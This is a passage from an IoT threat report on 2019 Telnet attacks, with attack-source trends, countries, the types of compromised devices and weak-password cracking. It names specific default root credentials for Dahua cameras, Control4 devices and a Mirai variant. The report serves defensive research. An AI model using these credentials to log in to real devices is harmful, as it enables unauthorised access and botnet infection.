In this section, we analyzed threats against three major protocols.
Threats Against Telnet
According to data from NSFOCUS’s threat hunting system, Telnet (available on port 23), targeted by a total of 120,000 attack sources, was the IoT protocol most favored by attackers1 . Figure 7-3 shows the activity trend of Telnet attack sources from March to October in 2019. We can see that the number of Telnet-based attacks increased month by month from March to August, with August seeing the most attack sources (over 60,000) that carried out more than 50,000 weak password detection activities. In addition, June witnessed the most sample download activities (more than 40,000). Overall, attack sources were on the decline in the latter half of 2019.
We analyzed attack sources from the geographical perspective and got top 10 countries with the most attack sources, as shown in Figure 7-4. Apparently, China and the USA took top two spots.
By correlating with asset intelligence data from NTI, we found that IoT devices accounted for 29% of attack sources, with routers (47%) and video surveillance devices (42%) as dominant players. See Figure 7-5. Arguably, the two kind of devices were most easily exploitable IoT devices.
Weak password cracking is the major means resorted by attackers to target Telnet. We made an analysis of weak password exploitation and found that many IoT devices were compromised after suffering weak password cracking. Table 7.3 lists top 10 weak passwords for cracking. Of those passwords, root-vizxv was cracked for a direct login to the background of security surveillance devices from Dahua; root-t0talc0ntr0l4! was the default access credential of smart home devices of Control4; root-taZz@23495859 was one of the weak password most frequently used by Asher, a Mirai variant, to infect routers.
To be continued.
